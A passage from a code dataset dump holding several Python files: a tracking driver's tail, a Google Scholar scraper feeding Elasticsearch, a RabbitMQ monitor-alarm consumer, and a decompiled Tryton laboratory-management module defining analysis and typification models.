(a negative\n # n_detect_max means: stop after that many drawn objects instead)\n if ((n_detect_max > 0) & (n_hits >= n_detect_max)) | ((n_detect_max < 0) & (n_iter >= -n_detect_max)):\n keep_going = False\n\n\n\n\n # If the break condition of max tracked or max observed is reached\n if ((n_track_max > 0) & (n_track >= n_track_max)) | ((n_track_max < 0) & (n_iter >= -n_track_max)):\n keep_going = False\n\n\n# Done going through model. Write out summary and quit\nss.detSuffix(detect_file, n_iter, n_hits, n_track)\n\n\n","sub_path":"Driver.py","file_name":"Driver.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"499375680","text":"import scholarly\nproxies = {'http' : 'socks5://127.0.0.1:9050', 'https': 'socks5://127.0.0.1:9050'}\nscholarly.scholarly.use_proxy(**proxies)\nraw_results = scholarly.search_pubs_query('china virus')\nfirst_result = next(raw_results)\n\nprint(first_result.bib)\n##\n\n\nfrom elasticsearch import Elasticsearch\nimport scholarly\nimport time\nimport nltk\nfrom spacy import displacy\nimport en_core_web_sm\nnlp = en_core_web_sm.load()\nfrom wordcloud import WordCloud\n\n##\n# SCRAPE\nresults = []\nfor index, result in enumerate(scholarly.search_pubs_query('china virus')):\n results.append(result.bib)\n if index > 3: break\nclob = '. '.join(['. 
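# The stop tests above encode two modes in one integer: a positive maximum
# stops after that many detected/tracked objects, while a negative value stops
# after abs(maximum) drawn objects. The same rule in isolation (hypothetical
# helper):
def should_stop(limit, n_matched, n_drawn):
    if limit > 0:
        return n_matched >= limit
    return n_drawn >= -limit

assert should_stop(10, n_matched=10, n_drawn=500)
assert should_stop(-1000, n_matched=3, n_drawn=1000)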
'.join(r.values()) for r in results])\n\n##\nwordcloud = WordCloud(background_color=\"white\", max_words=5000, contour_width=3, contour_color='steelblue')\nwordcloud.generate(clob)\nimg = wordcloud.to_image()\n##\ndisplacy.render(nlp(clob), style='ent', jupyter=False)\n##\n# Connect to the elastic cluster\nes = Elasticsearch([{'host': 'localhost', 'port': 9200}])\nprint(es)\n\n##\ndef print_process(search_terms, limit=3, wait_time=30):\n # .search_author .search_keyword\n n = 0\n search = scholarly.search_pubs_query(search_terms)\n for result in search:\n n += 1\n result = result.bib\n abstract = result['abstract']\n tokens = nltk.word_tokenize(abstract)\n tagl = nltk.pos_tag(tokens)\n # NER the abstract\n # Topic Model the abstract\n\n\n res = es.index(index='scholar_scrape', doc_type='scholar_search', id=result['url'], body=result)\n print(result)\n if n >= limit:\n break\n\n time.sleep(wait_time)\n\n\nprint_process('virus china', limit=100, wait_time=10)\n\n# Retrieve the author's data, fill-in, and print\nsearch_query = scholarly.search_author('Steven A Cholewiak')\nauthor = next(search_query).fill()\nprint(author)\n\n# Print the titles of the author's publications\nprint([pub.bib['title'] for pub in author.publications])\n\n# Take a closer look at the first publication\npub = author.publications[0].fill()\nprint(pub)\n\n# Which papers cited that publication?\nprint([citation.bib['title'] for citation in pub.get_citedby()])\n","sub_path":"scholar_elk.py","file_name":"scholar_elk.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"56936546","text":"#!/usr/bin/env python\nimport pika\nimport json\nimport socket\nimport os\n\nRABBIT_MQ_SERVER = os.environ[\"RABBIT_MQ_SERVER\"]\nRABBIT_MQ_USER = os.environ[\"RABBIT_MQ_USER\"]\nRABBIT_MQ_PWD = os.environ[\"RABBIT_MQ_PWD\"]\n\ncredentials = pika.PlainCredentials(RABBIT_MQ_USER, RABBIT_MQ_PWD)\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters(\n RABBIT_MQ_SERVER, credentials = credentials))\nchannel = connection.channel()\n\ndef callback(ch, method, properties, body):\n req = json.loads(body)\n\n status = req[\"monitor\"][\"result\"][\"status\"]\n if status != \"ok\":\n key = req[\"monitor\"][\"notifier\"][\"type\"]\n resp = json.dumps(req)\n channel.basic_publish(exchange='notifiers',\n routing_key=key,\n body=resp)\n\nchannel.basic_consume(callback,\n queue='results',\n no_ack=True)\nchannel.start_consuming()\n","sub_path":"monitor-alarm.py","file_name":"monitor-alarm.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"362485548","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/trytond/modules/lims/analysis.py\n# Compiled at: 2019-01-16 09:41:18\n# Size of source mod 2**32: 93905 bytes\nimport logging, operator\nfrom datetime import datetime\nfrom decimal import Decimal\nfrom sql import Literal\nfrom trytond.model import Workflow, ModelView, ModelSQL, fields, Unique\nfrom trytond.wizard import Wizard, StateTransition, StateView, StateAction, Button\nfrom trytond.pool import Pool\nfrom trytond.transaction import Transaction\nfrom trytond.pyson import PYSONEncoder, Eval, Equal, Bool, Not, Or, And\n__all__ = [\n 'ProductType', 'Matrix', 'Formula', 'FormulaVariable', 'Analysis',\n 
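# monitor-alarm.py above routes every non-"ok" result to a notifier exchange.
# A sketch of a producer that would exercise it, assuming the same broker
# environment variables and an existing 'results' queue (illustrative only):
import json
import os
import pika

credentials = pika.PlainCredentials(os.environ['RABBIT_MQ_USER'],
                                    os.environ['RABBIT_MQ_PWD'])
connection = pika.BlockingConnection(pika.ConnectionParameters(
    os.environ['RABBIT_MQ_SERVER'], credentials=credentials))
channel = connection.channel()
payload = {'monitor': {'result': {'status': 'error'},
                       'notifier': {'type': 'email'}}}
channel.basic_publish(exchange='', routing_key='results',
                      body=json.dumps(payload))
connection.close()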
'Typification', 'TypificationAditional', 'TypificationReadOnly',\n 'CalculatedTypification', 'CalculatedTypificationReadOnly',\n 'AnalysisIncluded', 'AnalysisLaboratory', 'AnalysisLabMethod',\n 'AnalysisDevice', 'CopyTypificationStart', 'CopyTypification',\n 'CopyCalculatedTypificationStart', 'CopyCalculatedTypification',\n 'RelateAnalysisStart', 'RelateAnalysis', 'CreateAnalysisProduct',\n 'OpenTypifications', 'AddTypificationsStart', 'AddTypifications',\n 'RemoveTypificationsStart', 'RemoveTypifications']\n\nclass Typification(ModelSQL, ModelView):\n \"\"\"Typification\"\"\"\n __name__ = 'lims.typification'\n product_type = fields.Many2One('lims.product.type', 'Product type', required=True,\n select=True,\n states={'readonly': Bool(Eval('id', 0) > 0)})\n matrix = fields.Many2One('lims.matrix', 'Matrix', required=True, select=True,\n states={'readonly': Bool(Eval('id', 0) > 0)})\n analysis = fields.Many2One('lims.analysis', 'Analysis', required=True, domain=[\n ('state', '=', 'active'),\n ('type', '=', 'analysis'),\n ('behavior', '!=', 'additional')],\n select=True,\n states={'readonly': Bool(Eval('id', 0) > 0)})\n method = fields.Many2One('lims.lab.method', 'Method', required=True, domain=[\n (\n 'id', 'in', Eval('method_domain'))],\n depends=[\n 'method_domain'],\n select=True)\n method_view = fields.Function((fields.Many2One('lims.lab.method', 'Method')), 'get_views_field',\n searcher='search_views_field')\n method_domain = fields.Function(fields.Many2Many('lims.lab.method', None, None, 'Method domain'), 'on_change_with_method_domain')\n detection_limit = fields.Float('Detection limit', digits=(\n 16, Eval('limit_digits', 2)),\n depends=['limit_digits'])\n quantification_limit = fields.Float('Quantification limit', digits=(\n 16, Eval('limit_digits', 2)),\n depends=['limit_digits'])\n limit_digits = fields.Integer('Limit digits')\n check_result_limits = fields.Boolean('Validate limits directly on the result')\n initial_concentration = fields.Char('Initial concentration')\n start_uom = fields.Many2One('product.uom', 'Start UoM', domain=[\n ('category.lims_only_available', '=', True)])\n final_concentration = fields.Char('Final concentration')\n end_uom = fields.Many2One('product.uom', 'End UoM', domain=[\n ('category.lims_only_available', '=', True)])\n default_repetitions = fields.Integer('Default repetitions', required=True)\n technical_scope_versions = fields.Function(fields.One2Many('lims.technical.scope.version', None, 'Technical scope versions'), 'get_technical_scope_versions')\n comments = fields.Text('Comments')\n additional = fields.Many2One('lims.analysis', 'Additional analysis', domain=[\n ('state', '=', 'active'), ('behavior', '=', 'additional')])\n additionals = fields.Many2Many('lims.typification-analysis', 'typification',\n 'analysis', 'Additional analysis', domain=[\n (\n 'id', 'in', Eval('additionals_domain'))],\n depends=[\n 'additionals_domain'])\n additionals_domain = fields.Function(fields.Many2Many('lims.analysis', None, None, 'Additional analysis domain'), 'on_change_with_additionals_domain')\n by_default = fields.Boolean('By default')\n calc_decimals = fields.Integer('Calculation decimals', required=True)\n report = fields.Boolean('Report')\n report_type = fields.Selection([\n ('normal', 'Normal'),\n ('polisample', 'Polisample')],\n 'Report type',\n sort=False)\n report_result_type = fields.Selection([\n ('result', 'Result'),\n ('both', 'Both')],\n 'Result type',\n sort=False)\n valid = fields.Boolean('Active', depends=['valid_readonly'], states={'readonly': 
Bool(Eval('valid_readonly'))})\n valid_view = fields.Function((fields.Boolean('Active')), 'get_views_field',\n searcher='search_views_field')\n valid_readonly = fields.Function(fields.Boolean('Field active readonly'), 'on_change_with_valid_readonly')\n\n @classmethod\n def __setup__(cls):\n super(Typification, cls).__setup__()\n cls._order.insert(0, ('product_type', 'ASC'))\n cls._order.insert(1, ('matrix', 'ASC'))\n cls._order.insert(2, ('analysis', 'ASC'))\n cls._order.insert(3, ('method', 'ASC'))\n t = cls.__table__()\n cls._sql_constraints += [\n (\n 'product_matrix_analysis_method_uniq',\n Unique(t, t.product_type, t.matrix, t.analysis, t.method),\n 'This typification already exists')]\n cls._error_messages.update({'limits':'Quantification limit must be greater than Detection limit', \n 'default_typification':'There is already a default typification for this combination of product type, matrix and analysis', \n 'not_default_typification':'This typification should be the default'})\n\n @staticmethod\n def default_limit_digits():\n return 2\n\n @staticmethod\n def default_default_repetitions():\n return 0\n\n @staticmethod\n def default_by_default():\n return True\n\n @staticmethod\n def default_calc_decimals():\n return 2\n\n @staticmethod\n def default_report():\n return True\n\n @staticmethod\n def default_report_type():\n return 'normal'\n\n @staticmethod\n def default_report_result_type():\n return 'result'\n\n @staticmethod\n def default_valid():\n return True\n\n @staticmethod\n def default_check_result_limits():\n return False\n\n @staticmethod\n def default_detection_limit():\n return 0.0\n\n @staticmethod\n def default_quantification_limit():\n return 0.0\n\n @classmethod\n def get_views_field(cls, typifications, names):\n result = {}\n for name in names:\n field_name = name[:-5]\n result[name] = {}\n if field_name == 'valid':\n for t in typifications:\n result[name][t.id] = getattr(t, field_name, None)\n\n else:\n for t in typifications:\n field = getattr(t, field_name, None)\n result[name][t.id] = field.id if field else None\n\n return result\n\n @classmethod\n def search_views_field(cls, name, clause):\n return [(name[:-5],) + tuple(clause[1:])]\n\n @fields.depends('analysis')\n def on_change_with_valid_readonly(self, name=None):\n if self.analysis:\n if self.analysis.state == 'disabled':\n return True\n return False\n\n @fields.depends('analysis')\n def on_change_analysis(self):\n method = None\n if self.analysis:\n methods = self.on_change_with_method_domain()\n if len(methods) == 1:\n method = methods[0]\n self.method = method\n\n @fields.depends('analysis')\n def on_change_with_method_domain(self, name=None):\n methods = []\n if self.analysis:\n if self.analysis.methods:\n methods = [m.id for m in self.analysis.methods]\n return methods\n\n def get_technical_scope_versions(self, name=None):\n pool = Pool()\n TechnicalScopeVersionLine = pool.get('lims.technical.scope.version.line')\n version_lines = TechnicalScopeVersionLine.search([\n (\n 'typification', '=', self.id),\n ('version.valid', '=', True)])\n if version_lines:\n return [line.version.id for line in version_lines]\n return []\n\n @fields.depends('analysis', 'product_type', 'matrix')\n def on_change_with_additionals_domain(self, name=None):\n cursor = Transaction().connection.cursor()\n pool = Pool()\n Analysis = pool.get('lims.analysis')\n Typification = pool.get('lims.typification')\n if not self.analysis:\n return []\n else:\n return self.product_type and self.matrix or []\n cursor.execute('SELECT a.id FROM 
\"' + Analysis._table + '\" a INNER JOIN \"' + Typification._table + '\" t ON a.id = t.analysis WHERE a.id != %s AND a.type = \\'analysis\\' AND a.behavior != \\'additional\\' AND a.state = \\'active\\' AND t.product_type = %s AND t.matrix = %s AND t.valid IS TRUE', (\n self.analysis.id, self.product_type.id, self.matrix.id))\n res = cursor.fetchall()\n return res or []\n return [x[0] for x in res]\n\n def get_rec_name(self, name):\n return self.product_type.rec_name + '-' + self.matrix.rec_name\n\n @classmethod\n def search_rec_name(cls, name, clause):\n typifications = cls.search(['OR',\n ('product_type', ) + tuple(clause[1:]),\n ('matrix', ) + tuple(clause[1:]),\n ('analysis', ) + tuple(clause[1:]),\n ('method', ) + tuple(clause[1:])],\n order=[])\n if typifications:\n return [\n (\n 'id', 'in', [t.id for t in typifications])]\n return [\n (\n cls._rec_name,) + tuple(clause[1:])]\n\n @classmethod\n def validate(cls, typifications):\n super(Typification, cls).validate(typifications)\n for t in typifications:\n t.check_limits()\n t.check_default()\n\n def check_limits(self):\n if self.detection_limit:\n if self.quantification_limit <= self.detection_limit:\n self.raise_user_error('limits')\n\n def check_default(self):\n if self.by_default:\n typifications = self.search([\n (\n 'product_type', '=', self.product_type.id),\n (\n 'matrix', '=', self.matrix.id),\n (\n 'analysis', '=', self.analysis.id),\n ('valid', '=', True),\n ('by_default', '=', True),\n (\n 'id', '!=', self.id)])\n if typifications:\n self.raise_user_error('default_typification')\n elif self.valid:\n typifications = self.search([\n (\n 'product_type', '=', self.product_type.id),\n (\n 'matrix', '=', self.matrix.id),\n (\n 'analysis', '=', self.analysis.id),\n ('valid', '=', True),\n (\n 'id', '!=', self.id)])\n if not typifications:\n self.raise_user_error('not_default_typification')\n\n @classmethod\n def create(cls, vlist):\n typifications = super(Typification, cls).create(vlist)\n active_typifications = [t for t in typifications if t.valid]\n cls.create_typification_calculated(active_typifications)\n return typifications\n\n @classmethod\n def create_typification_calculated(cls, typifications):\n cursor = Transaction().connection.cursor()\n pool = Pool()\n Analysis = pool.get('lims.analysis')\n CalculatedTypification = pool.get('lims.typification.calculated')\n for typification in typifications:\n cursor.execute('SELECT DISTINCT(analysis) FROM \"' + cls._table + '\" WHERE product_type = %s AND matrix = %s AND valid', (\n typification.product_type.id, typification.matrix.id))\n typified_analysis = [a[0] for a in cursor.fetchall()]\n typified_analysis_ids = ', '.join((str(a) for a in typified_analysis))\n sets_groups_ids = Analysis.get_parents_analysis(typification.analysis.id)\n for set_group_id in sets_groups_ids:\n t_set_group = CalculatedTypification.search([\n (\n 'product_type', '=', typification.product_type.id),\n (\n 'matrix', '=', typification.matrix.id),\n (\n 'analysis', '=', set_group_id)])\n ia = t_set_group or Analysis.get_included_analysis_analysis(set_group_id)\n if not ia:\n continue\n else:\n included_ids = ', '.join((str(a) for a in ia))\n cursor.execute('SELECT id FROM \"' + Analysis._table + '\" WHERE id IN (' + included_ids + ') AND id NOT IN (' + typified_analysis_ids + ')')\n if cursor.fetchone():\n typified = False\n else:\n typified = True\n if typified:\n typification_create = [\n {'product_type':typification.product_type.id, 'matrix':typification.matrix.id, \n 'analysis':set_group_id}]\n 
CalculatedTypification.create(typification_create)\n\n return typifications\n\n @classmethod\n def delete(cls, typifications):\n cls.delete_typification_calculated(typifications)\n super(Typification, cls).delete(typifications)\n\n @classmethod\n def delete_typification_calculated(cls, typifications):\n pool = Pool()\n Analysis = pool.get('lims.analysis')\n CalculatedTypification = pool.get('lims.typification.calculated')\n for typification in typifications:\n others = cls.search([\n (\n 'product_type', '=', typification.product_type.id),\n (\n 'matrix', '=', typification.matrix.id),\n (\n 'analysis', '=', typification.analysis.id),\n ('valid', '=', True),\n (\n 'id', '!=', typification.id)])\n if others:\n continue\n sets_groups_ids = Analysis.get_parents_analysis(typification.analysis.id)\n for set_group_id in sets_groups_ids:\n typified_set_group = CalculatedTypification.search([\n (\n 'product_type', '=', typification.product_type.id),\n (\n 'matrix', '=', typification.matrix.id),\n (\n 'analysis', '=', set_group_id)])\n if typified_set_group:\n CalculatedTypification.delete(typified_set_group)\n\n @classmethod\n def write(cls, *args):\n (super(Typification, cls).write)(*args)\n actions = iter(args)\n for typifications, vals in zip(actions, actions):\n if 'valid' in vals:\n if vals['valid']:\n cls.create_typification_calculated(typifications)\n else:\n cls.delete_typification_calculated(typifications)\n fields_check = ('detection_limit', 'quantification_limit', 'initial_concentration',\n 'final_concentration', 'start_uom', 'end_uom', 'calc_decimals',\n 'report')\n for field in fields_check:\n if field in vals:\n cls.update_laboratory_notebook(typifications)\n break\n\n @classmethod\n def update_laboratory_notebook(cls, typifications):\n NotebookLine = Pool().get('lims.notebook.line')\n for typification in typifications:\n if not typification.valid:\n continue\n notebook_lines = NotebookLine.search([\n ('notebook.fraction.special_type', '!=', 'rm'),\n (\n 'notebook.product_type', '=', typification.product_type.id),\n (\n 'notebook.matrix', '=', typification.matrix.id),\n (\n 'analysis', '=', typification.analysis.id),\n (\n 'method', '=', typification.method.id),\n ('end_date', '=', None)])\n if notebook_lines:\n NotebookLine.write(notebook_lines, {'detection_limit':str(typification.detection_limit), \n 'quantification_limit':str(typification.quantification_limit), \n 'initial_concentration':str(typification.initial_concentration or ''), \n 'final_concentration':str(typification.final_concentration or ''), \n 'initial_unit':typification.start_uom, \n 'final_unit':typification.end_uom, \n 'decimals':typification.calc_decimals, \n 'report':typification.report})\n notebook_lines = NotebookLine.search([\n ('notebook.fraction.special_type', '=', 'rm'),\n (\n 'notebook.product_type', '=', typification.product_type.id),\n (\n 'notebook.matrix', '=', typification.matrix.id),\n (\n 'analysis', '=', typification.analysis.id),\n (\n 'method', '=', typification.method.id),\n ('end_date', '=', None)])\n if notebook_lines:\n NotebookLine.write(notebook_lines, {'initial_concentration': str(typification.initial_concentration or '')})\n\n\nclass TypificationAditional(ModelSQL):\n __doc__ = 'Typification - Additional analysis'\n __name__ = 'lims.typification-analysis'\n typification = fields.Many2One('lims.typification', 'Typification', ondelete='CASCADE',\n select=True,\n required=True)\n analysis = fields.Many2One('lims.analysis', 'Analysis', ondelete='CASCADE',\n select=True,\n 
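# Typification.write() above refreshes still-open notebook lines (end_date is
# NULL) only when one of a fixed set of fields changes. That trigger test in
# isolation (same field tuple as the source, illustrative wrapper):
FIELDS_CHECK = ('detection_limit', 'quantification_limit',
                'initial_concentration', 'final_concentration',
                'start_uom', 'end_uom', 'calc_decimals', 'report')

def needs_notebook_update(vals):
    return any(field in vals for field in FIELDS_CHECK)

assert needs_notebook_update({'calc_decimals': 3})
assert not needs_notebook_update({'comments': 'x'})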
required=True)\n\n\nclass TypificationReadOnly(ModelSQL, ModelView):\n __doc__ = 'Typification'\n __name__ = 'lims.typification.readonly'\n product_type = fields.Many2One('lims.product.type', 'Product type', readonly=True)\n matrix = fields.Many2One('lims.matrix', 'Matrix', readonly=True)\n analysis = fields.Many2One('lims.analysis', 'Analysis', readonly=True)\n method = fields.Many2One('lims.lab.method', 'Method', readonly=True)\n\n @classmethod\n def __setup__(cls):\n super(TypificationReadOnly, cls).__setup__()\n cls._order.insert(0, ('product_type', 'ASC'))\n cls._order.insert(1, ('matrix', 'ASC'))\n cls._order.insert(2, ('analysis', 'ASC'))\n cls._order.insert(3, ('method', 'ASC'))\n\n @staticmethod\n def table_query():\n pool = Pool()\n typification = pool.get('lims.typification').__table__()\n columns = [\n typification.id,\n typification.create_uid,\n typification.create_date,\n typification.write_uid,\n typification.write_date,\n typification.product_type,\n typification.matrix,\n typification.analysis,\n typification.method]\n where = Literal(True)\n return (typification.select)(*columns, **{'where': where})\n\n\nclass CalculatedTypification(ModelSQL):\n __doc__ = 'Calculated Typification'\n __name__ = 'lims.typification.calculated'\n product_type = fields.Many2One('lims.product.type', 'Product type', required=True,\n select=True)\n matrix = fields.Many2One('lims.matrix', 'Matrix', required=True, select=True)\n analysis = fields.Many2One('lims.analysis', 'Analysis', required=True, ondelete='CASCADE',\n select=True)\n\n @classmethod\n def __register__(cls, module_name):\n super(CalculatedTypification, cls).__register__(module_name)\n if cls.search_count([]) == 0:\n cls.populate_typification_calculated()\n\n @classmethod\n def populate_typification_calculated(cls):\n cursor = Transaction().connection.cursor()\n pool = Pool()\n Analysis = pool.get('lims.analysis')\n Typification = pool.get('lims.typification')\n cursor.execute('SELECT DISTINCT(product_type, matrix) FROM \"' + Typification._table + '\" WHERE valid')\n typifications = cursor.fetchall()\n if typifications:\n typifications_count = 0\n typifications_total = len(typifications)\n for typification in typifications:\n typifications_count += 1\n logging.getLogger('lims').info('Calculating typification %s of %s' % (\n typifications_count, typifications_total))\n product_type = int(typification[0].split(',')[0][1:])\n matrix = int(typification[0].split(',')[1][:-1])\n cursor.execute('SELECT DISTINCT(analysis) FROM \"' + Typification._table + '\" WHERE product_type = %s AND matrix = %s AND valid', (\n product_type, matrix))\n typified_analysis = [a[0] for a in cursor.fetchall()]\n typified_analysis_ids = ', '.join((str(a) for a in typified_analysis))\n cursor.execute('SELECT id FROM \"' + Analysis._table + '\" WHERE type IN (\\'set\\', \\'group\\') AND state = \\'active\\'')\n sets_groups_ids = [x[0] for x in cursor.fetchall()]\n if sets_groups_ids:\n for set_group_id in sets_groups_ids:\n typified = True\n ia = Analysis.get_included_analysis_analysis(set_group_id)\n if not ia:\n continue\n included_ids = ', '.join((str(a) for a in ia))\n cursor.execute('SELECT id FROM \"' + Analysis._table + '\" WHERE id IN (' + included_ids + ') AND id NOT IN (' + typified_analysis_ids + ')')\n if cursor.fetchone():\n typified = False\n if typified:\n typification_create = [\n {'product_type':product_type, 'matrix':matrix, \n 'analysis':set_group_id}]\n cls.create(typification_create)\n\n\nclass CalculatedTypificationReadOnly(ModelSQL, 
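# table_query above backs a read-only model with a plain SELECT built with
# python-sql. Outside Tryton the same construction looks like this
# (illustrative table name; cursor.execute(*select) is the usual python-sql
# execution idiom):
from sql import Table, Literal

t = Table('lims_typification')
select = t.select(t.id, t.product_type, t.matrix, where=Literal(True))
# cursor.execute(*select)  # expands to the SQL string plus its parameters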
ModelView):\n __doc__ = 'Calculated Typification'\n __name__ = 'lims.typification.calculated.readonly'\n product_type = fields.Many2One('lims.product.type', 'Product type', readonly=True)\n matrix = fields.Many2One('lims.matrix', 'Matrix', readonly=True)\n analysis = fields.Many2One('lims.analysis', 'Analysis', readonly=True)\n\n @classmethod\n def __setup__(cls):\n super(CalculatedTypificationReadOnly, cls).__setup__()\n cls._order.insert(0, ('product_type', 'ASC'))\n cls._order.insert(1, ('matrix', 'ASC'))\n cls._order.insert(2, ('analysis', 'ASC'))\n\n @staticmethod\n def table_query():\n pool = Pool()\n typification = pool.get('lims.typification.calculated').__table__()\n columns = [\n typification.id,\n typification.create_uid,\n typification.create_date,\n typification.write_uid,\n typification.write_date,\n typification.product_type,\n typification.matrix,\n typification.analysis]\n where = Literal(True)\n return (typification.select)(*columns, **{'where': where})\n\n\nclass ProductType(ModelSQL, ModelView):\n __doc__ = 'Product Type'\n __name__ = 'lims.product.type'\n _rec_name = 'description'\n code = fields.Char('Code', required=True)\n description = fields.Char('Description', required=True)\n restricted_entry = fields.Boolean('Restricted entry')\n\n @classmethod\n def __setup__(cls):\n super(ProductType, cls).__setup__()\n t = cls.__table__()\n cls._sql_constraints += [\n (\n 'code_uniq', Unique(t, t.code),\n 'Product type code must be unique')]\n\n @staticmethod\n def default_restricted_entry():\n return False\n\n def get_rec_name(self, name):\n if self.code:\n return self.code + ' - ' + self.description\n return self.description\n\n @classmethod\n def search_rec_name(cls, name, clause):\n field = None\n for field in ('code', 'description'):\n records = cls.search([(field,) + tuple(clause[1:])], limit=1)\n if records:\n break\n\n if records:\n return [\n (\n field,) + tuple(clause[1:])]\n return [\n (\n cls._rec_name,) + tuple(clause[1:])]\n\n\nclass Matrix(ModelSQL, ModelView):\n \"\"\"Matrix\"\"\"\n __name__ = 'lims.matrix'\n _rec_name = 'description'\n code = fields.Char('Code', required=True)\n description = fields.Char('Description', required=True)\n restricted_entry = fields.Boolean('Restricted entry')\n\n @classmethod\n def __setup__(cls):\n super(Matrix, cls).__setup__()\n t = cls.__table__()\n cls._sql_constraints += [\n (\n 'code_uniq', Unique(t, t.code),\n 'Matrix code must be unique')]\n\n @staticmethod\n def default_restricted_entry():\n return False\n\n def get_rec_name(self, name):\n if self.code:\n return self.code + ' - ' + self.description\n return self.description\n\n @classmethod\n def search_rec_name(cls, name, clause):\n field = None\n for field in ('code', 'description'):\n records = cls.search([(field,) + tuple(clause[1:])], limit=1)\n if records:\n break\n\n if records:\n return [\n (\n field,) + tuple(clause[1:])]\n return [\n (\n cls._rec_name,) + tuple(clause[1:])]\n\n\nclass Formula(ModelSQL, ModelView):\n \"\"\"Formula\"\"\"\n __name__ = 'lims.formula'\n name = fields.Char('Name', required=True)\n formula = fields.Char('Formula', required=True)\n variables = fields.One2Many('lims.formula.variable', 'formula', 'Variables',\n required=True)\n\n\nclass FormulaVariable(ModelSQL, ModelView):\n __doc__ = 'Formula Variable'\n __name__ = 'lims.formula.variable'\n formula = fields.Many2One('lims.formula', 'Formula', required=True, ondelete='CASCADE',\n select=True)\n number = fields.Char('Number', required=True)\n description = fields.Char('Description', 
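# ProductType.search_rec_name above (and Matrix below it) probe 'code' first
# and fall back to 'description'. The lookup order on plain records
# (illustrative helper):
def match_field(records, value):
    for field in ('code', 'description'):
        if any(r.get(field) == value for r in records):
            return field
    return None

rows = [{'code': 'WAT', 'description': 'Water'}]
assert match_field(rows, 'WAT') == 'code'
assert match_field(rows, 'Water') == 'description'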
required=True)\n fraction_type = fields.Many2One('lims.fraction.type', 'Fraction type')\n constant = fields.Char('Constant')\n\n\nclass Analysis(Workflow, ModelSQL, ModelView):\n __doc__ = 'Analysis/Set/Group'\n __name__ = 'lims.analysis'\n _rec_name = 'description'\n code = fields.Char('Code', required=True, states={'readonly': Eval('state') != 'draft'},\n depends=['state'])\n description = fields.Char('Description', required=True, translate=True, states={'readonly': Bool(Equal(Eval('state'), 'disabled'))},\n depends=[\n 'state'])\n type = fields.Selection([\n ('analysis', 'Analysis'),\n ('set', 'Set'),\n ('group', 'Group')],\n 'Type',\n sort=False, required=True, states={'readonly': Eval('state') != 'draft'},\n depends=['state'])\n laboratories = fields.One2Many('lims.analysis-laboratory', 'analysis', 'Laboratories',\n context={'type': Eval('type')}, states={'invisible':Or(Eval('type').in_(['group']), Bool(Equal(Eval('behavior'), 'additional'))), \n 'required':Not(Or(Eval('type').in_(['set', 'group']), Bool(Equal(Eval('behavior'), 'additional')))), \n 'readonly':Bool(Equal(Eval('state'), 'disabled'))},\n depends=[\n 'type', 'behavior', 'state'])\n laboratory_domain = fields.Function(fields.Many2Many('lims.laboratory', None, None, 'Laboratories'), 'on_change_with_laboratory_domain')\n methods = fields.Many2Many('lims.analysis-lab.method', 'analysis', 'method',\n 'Methods', states={'invisible':Or(Eval('type').in_(['set', 'group']), Bool(Equal(Eval('behavior'), 'additional'))), \n 'required':Not(Or(Eval('type').in_(['set', 'group']), Bool(Equal(Eval('behavior'), 'additional')))), \n 'readonly':Bool(Equal(Eval('state'), 'disabled'))},\n depends=[\n 'type', 'behavior', 'state'])\n devices = fields.One2Many('lims.analysis.device', 'analysis', 'Devices', context={'laboratory_domain': Eval('laboratory_domain')},\n states={'invisible':Or(Eval('type').in_(['set', 'group']), Bool(Equal(Eval('behavior'), 'additional'))), \n 'readonly':Bool(Equal(Eval('state'), 'disabled'))},\n depends=[\n 'type', 'behavior', 'laboratory_domain', 'state'])\n start_date = fields.Date('Entry date', readonly=True)\n end_date = fields.Date('Leaving date', readonly=True)\n included_analysis = fields.One2Many('lims.analysis.included', 'analysis', 'Included analysis',\n context={'analysis':Eval('id'), \n 'type':Eval('type'), 'laboratory_domain':Eval('laboratory_domain')},\n states={'invisible':Bool(Equal(Eval('type'), 'analysis')), \n 'readonly':Bool(Equal(Eval('state'), 'disabled'))},\n depends=[\n 'type', 'laboratory_domain', 'state'])\n all_included_analysis = fields.Function(fields.One2Many('lims.analysis', None, 'All included analysis'), 'on_change_with_all_included_analysis')\n behavior = fields.Selection([\n ('normal', 'Normal'),\n ('internal_relation', 'Internal Relation'),\n ('additional', 'Additional')],\n 'Behavior',\n required=True, sort=False, states={'readonly': Or(Eval('type').in_(['set', 'group']), Eval('state') != 'draft')},\n depends=[\n 'type', 'state'])\n result_formula = fields.Char('Result formula', states={'invisible':Not(Bool(Equal(Eval('behavior'), 'internal_relation'))), \n 'required':Bool(Equal(Eval('behavior'), 'internal_relation')), \n 'readonly':Bool(Equal(Eval('state'), 'disabled'))},\n depends=[\n 'behavior', 'state'])\n converted_result_formula = fields.Char('Converted result formula', states={'invisible':Not(Bool(Equal(Eval('behavior'), 'internal_relation'))), \n 'required':Bool(Equal(Eval('behavior'), 'internal_relation')), \n 'readonly':Bool(Equal(Eval('state'), 'disabled'))},\n 
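# The states dictionaries above are PYSON expressions evaluated client-side
# against the record's values. They can be checked in isolation with
# PYSONEncoder/PYSONDecoder (illustrative context values):
from trytond.pyson import Bool, Equal, Eval, Or, PYSONDecoder, PYSONEncoder

expr = Or(Eval('type').in_(['set', 'group']),
          Bool(Equal(Eval('behavior'), 'additional')))
encoded = PYSONEncoder().encode(expr)
decoder = PYSONDecoder({'type': 'analysis', 'behavior': 'additional'})
assert decoder.decode(encoded)  # hidden because behavior == 'additional'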
